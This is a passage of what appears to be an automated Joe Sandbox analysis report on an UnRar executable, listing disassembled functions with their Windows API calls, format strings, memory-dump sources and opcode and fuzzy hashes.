                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2552172544-0
                                                            • Opcode ID: 349bdd9ee68cd3667234dcdbb2096cdd6753cf153402beb55eb55cb143ca9618
                                                            • Instruction ID: a9d53e866369275b967206eec14c7c9e0aee4979b8011fdb4edac2f9517d2667
                                                            • Opcode Fuzzy Hash: 349bdd9ee68cd3667234dcdbb2096cdd6753cf153402beb55eb55cb143ca9618
                                                            • Instruction Fuzzy Hash: C001E962A1B786C1FE10A724E05123DE351FB8CB90F811371EAED03BA9EF2CE1418710
                                                            Function 00007FF7AACCCCF0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: cb4fcf34211b689858c5a42a4b1511a36d60e11f23411a46ee6101c3d4456d17
                                                            • Instruction ID: 9e0278fa4d3c140b3864ca9fad17848ad4b10243cd9e8c2d9cfe39a533f5a150
                                                            • Opcode Fuzzy Hash: cb4fcf34211b689858c5a42a4b1511a36d60e11f23411a46ee6101c3d4456d17
                                                            • Instruction Fuzzy Hash: 40F0A96250D341C5FA51BF76A0001786B50DF1A7B4F5513B5DA7C0B6E7CD1CD4568721
                                                            Function 00007FF7AACBE42C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • fflush.LIBCMT ref: 00007FF7AACBE45F
                                                              • Part of subcall function 00007FF7AACBE0C0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACBE48C), ref: 00007FF7AACBDF59
                                                              • Part of subcall function 00007FF7AACBE0C0: WriteFile.KERNEL32 ref: 00007FF7AACBDF8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileHandleWritefflush
                                                            • String ID:
                                                            • API String ID: 552385020-0
                                                            • Opcode ID: 74238e5117bc292d8bc44197f2cfd05b46cc5b802461277d50ee2fd4a16c68bf
                                                            • Instruction ID: ff4b40e7b7d852a89d4195078f7af5660b7db0041651d64d516c3b202b5308b0
                                                            • Opcode Fuzzy Hash: 74238e5117bc292d8bc44197f2cfd05b46cc5b802461277d50ee2fd4a16c68bf
                                                            • Instruction Fuzzy Hash: 04F0B473916752C2FA08BB61E45147DB690EB54B80F954079E56F433B2CF3DE062CB10
                                                            Function 00007FF7AACBE0C0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • fflush.LIBCMT ref: 00007FF7AACBE0EE
                                                              • Part of subcall function 00007FF7AACBE0C0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACBE48C), ref: 00007FF7AACBDF59
                                                              • Part of subcall function 00007FF7AACBE0C0: WriteFile.KERNEL32 ref: 00007FF7AACBDF8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileHandleWritefflush
                                                            • String ID:
                                                            • API String ID: 552385020-0
                                                            • Opcode ID: 9b63a5d40fee7c7253d4ac6e7765d7df84e7190a30081763eabd28ba8ee871f3
                                                            • Instruction ID: a845221cdccc5ad42b53da67fbda7eb2722778c0491e2aee7ca6342b1b46ae68
                                                            • Opcode Fuzzy Hash: 9b63a5d40fee7c7253d4ac6e7765d7df84e7190a30081763eabd28ba8ee871f3
                                                            • Instruction Fuzzy Hash: 4AF0E572916746C1FA08BB51E8511BCB690EB94B80F964078E68F033B2CF3DD4A2CB50
                                                            Function 00007FF7AACCA24C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: c0e87eca560c6a13e191088489c6e67a2db27eff7176a6481a3dcd7bf0e74fb5
                                                            • Instruction ID: c275ed88f6c168fb7e833bfd9b45d46d471ef13f0409745a78995f38a3d89e5c
                                                            • Opcode Fuzzy Hash: c0e87eca560c6a13e191088489c6e67a2db27eff7176a6481a3dcd7bf0e74fb5
                                                            • Instruction Fuzzy Hash: 3AE0C212B25921C2FF24BF7AC849638A321EF8CF85B8A60B0CE4D07775CE29C4838710
                                                            Function 00007FF7AACFC380 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: __vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1180542099-0
                                                            • Opcode ID: 0eccd9320293dcb74243854bb9a32ffe1e760ebf6d3a6692442ede9b69c2917c
                                                            • Instruction ID: 102042d43d9fc49a88041aa03479edb50eab6e123d7435ffca4e44736bec4fde
                                                            • Opcode Fuzzy Hash: 0eccd9320293dcb74243854bb9a32ffe1e760ebf6d3a6692442ede9b69c2917c
                                                            • Instruction Fuzzy Hash: D1E09262F0F303C5FA56BA2859621BE92506F24354FD219F6D82E422F29E1DA14B5731
                                                            Function 00007FF7AACC9FA0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 734e9c2b30ed36349922e1ec199f57aa50a1b3de9925b377ab130616e0e4bb72
                                                            • Instruction ID: b48af145b0999459aaf68f05ec4b9f023500a808af78847cda9fafe0398d1cf6
                                                            • Opcode Fuzzy Hash: 734e9c2b30ed36349922e1ec199f57aa50a1b3de9925b377ab130616e0e4bb72
                                                            • Instruction Fuzzy Hash: 02D0C922E0A841C2F9106A359C5107CA250AF52735FE517B0D23A916F2CA1E95979320
                                                            Function 00007FF7AACE53B4 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID:
                                                            • API String ID: 1825529933-0
                                                            • Opcode ID: ea5a4e28a5ab6697cbef71e761ab9c98f563bc440a6420649e137bcb4bfdad89
                                                            • Instruction ID: 8d78530c49b4d76961fe42a1529d81d83e4054b62b22873f27ce0a7e9c9ca68e
                                                            • Opcode Fuzzy Hash: ea5a4e28a5ab6697cbef71e761ab9c98f563bc440a6420649e137bcb4bfdad89
                                                            • Instruction Fuzzy Hash: E4C013B1904DC187D3305F547C415567E51F798394F900338D79D52BF8CA3CC1614754
                                                            Function 00007FF7AAD07170 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 1481a017f613698afefeacfa3722c04c26d0b13473c49b862d3169a472f57873
                                                            • Instruction ID: 394b2b10dc06191be2dfc733611e38e2e8398f04ee7de4a73921650a679c900c
                                                            • Opcode Fuzzy Hash: 1481a017f613698afefeacfa3722c04c26d0b13473c49b862d3169a472f57873
                                                            • Instruction Fuzzy Hash: BAD01761D1B942CAF704AB00E948774A360FF28306FC206B4C0AD1C17D8F2C204EC320
                                                            Function 00007FF7AACFE4C0 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: 8aeec84db384cfb678346af94ffe354f6528abb73e420e88c968a6f12f127fda
                                                            • Instruction ID: db9552d9bb9a018b53c7cc0bb90c3ee0332155d0c8f24db5b9449bcbbd2b2a31
                                                            • Opcode Fuzzy Hash: 8aeec84db384cfb678346af94ffe354f6528abb73e420e88c968a6f12f127fda
                                                            • Instruction Fuzzy Hash: DCF04F5AB0B307C6FE6576A954602BD92815F84B40FCA54B4C90E867E2EF1CF4434330
                                                            Function 00007FF7AACC9BE0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: acc60966b339b2c568dcc73d6e32df30c0d7408fa31308555a892ea035ba4edb
                                                            • Instruction ID: a19d19ce68f3b92fb97e66322bba6abc6bb19abe1ce65aad7f34cc582cc75387
                                                            • Opcode Fuzzy Hash: acc60966b339b2c568dcc73d6e32df30c0d7408fa31308555a892ea035ba4edb
                                                            • Instruction Fuzzy Hash: A3F0AF32A0A682D5FB249F31E040379B6A0EB04B78F8A6374D67C411E8CF2CD8968364
                                                            Function 00007FF7AACFD274 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: a1b652305956cce7bf839444ccffb9bf7c7336756369d5c836dcd4f1c46fc9b5
                                                            • Instruction ID: 2ad0249f8cacb1991c49525adde0653b4601d836ba51de26f3f7c645f5799d2f
                                                            • Opcode Fuzzy Hash: a1b652305956cce7bf839444ccffb9bf7c7336756369d5c836dcd4f1c46fc9b5
                                                            • Instruction Fuzzy Hash: CEF05E12B0F707C5FA9676A1586037D91805F54764F8A57B1D82E853E2DE5CF8438370

                                                            Non-executed Functions

                                                            Function 00007FF7AACCEE64 Relevance: 125.1, APIs: 10, Strings: 61, Instructions: 879COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadStringswprintf$fflush
                                                            • String ID: %12ls: $%12ls: $%12ls: %8.8X$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %ls$%12ls: %u$%12ls: RAR %ls(v%d) -m%d%s$%12s: %s$%c%10ls %9ls $%ls$%ls$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$ $ %ls $ -md=$ -md=$ -md=$ -md=?$#%d$#%d$%02x%02x..%02x $%8.8X $%9ls %4ls $%cB$%d%%$%ls$%ls$%ls$%ls $%ls $%s$*<-?->$-->$1.5$5.0$<--$<->$???????? $BLAKE2$BLAKE2 MAC$CRC32$CRC32 MAC$Pack-BLAKE2$Pack-CRC32$STM$Unix$Unix owner$Windows
                                                            • API String ID: 1297088633-4266122169
                                                            • Opcode ID: 94eceedc0936630acec691374a9462fb3895f28a0a53fd037fd47dd81392fc3e
                                                            • Instruction ID: a8012a8a1e48c8db83cd033cb87f925f2d60beb545c8476fb3e552fa40a1d27d
                                                            • Opcode Fuzzy Hash: 94eceedc0936630acec691374a9462fb3895f28a0a53fd037fd47dd81392fc3e
                                                            • Instruction Fuzzy Hash: FF92B322A1A782C0FA00BF24D4542FDA761EF84784FD26176E65E476F6EF2CE546C360
                                                            Function 00007FF7AACCE350 Relevance: 46.0, APIs: 2, Strings: 24, Instructions: 493COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: LoadString$_invalid_parameter_noinfo_noreturnfflushswprintf
                                                            • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$%s: %s$%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$, %s$, %s$, %s$, %s$, %s$, %s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                            • API String ID: 2121331369-348187198
                                                            • Opcode ID: 8c2e531027ccfc99470035508384b230bec2b673dd9bb41c76ff03144c05fe9d
                                                            • Instruction ID: 8952c8407a4e1df137ae0e6d80ce2d4b3ecb161b0c1913fb78b9d05748ee1e5a
                                                            • Opcode Fuzzy Hash: 8c2e531027ccfc99470035508384b230bec2b673dd9bb41c76ff03144c05fe9d
                                                            • Instruction Fuzzy Hash: A4328222A0A6C2C5FB20BF65D4500FDB7A1EF81744FC510B6DA4E476AADF2DE646C720
                                                            Function 00007FF7AACD0EA4 Relevance: 44.5, APIs: 12, Strings: 13, Instructions: 706COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: snprintf$_invalid_parameter_noinfo_noreturn
                                                            • String ID: %02u$%02u$%02u$%02u$%02u$%02u$%03u$%04u$%05u$+$.rar$YMDHISWAEN$yyyymmddhhmmss
                                                            • API String ID: 2530296757-3573682242
                                                            • Opcode ID: 945ce28207651928cbff0d4fc424e4634f313579d504869630c1d1a418f82a37
                                                            • Instruction ID: 62ceb5b4d38297439f5fb68c3e28e0c7f1458fa97af4fc4733c4eb964be51115
                                                            • Opcode Fuzzy Hash: 945ce28207651928cbff0d4fc424e4634f313579d504869630c1d1a418f82a37
                                                            • Instruction Fuzzy Hash: F052DE22F1A752D9FB00EB64D8802ADA7B1FB44788F921175DA4D13AB9DF3CE586C710
                                                            Function 00007FF7AACC1758 Relevance: 42.8, APIs: 20, Strings: 4, Instructions: 770fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandle$CreateErrorLastProcessToken$AdjustControlCurrentDeleteDeviceDirectoryLookupOpenPrivilegePrivilegesRemoveValue
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 208058286-3508440684
                                                            • Opcode ID: 71896d451b5efdc15bcecc7f7ca8d95a8422a5e865d981eacb25da5a0dc27730
                                                            • Instruction ID: 6bad00e0a4cb68040e07c6854894c28de65c39e7a203120fbc64791db22f7069
                                                            • Opcode Fuzzy Hash: 71896d451b5efdc15bcecc7f7ca8d95a8422a5e865d981eacb25da5a0dc27730
                                                            • Instruction Fuzzy Hash: E662FF62F1A782C1FB00EF75D4442ADA361FB44794F826271DA9D13AE9EF38D946C310
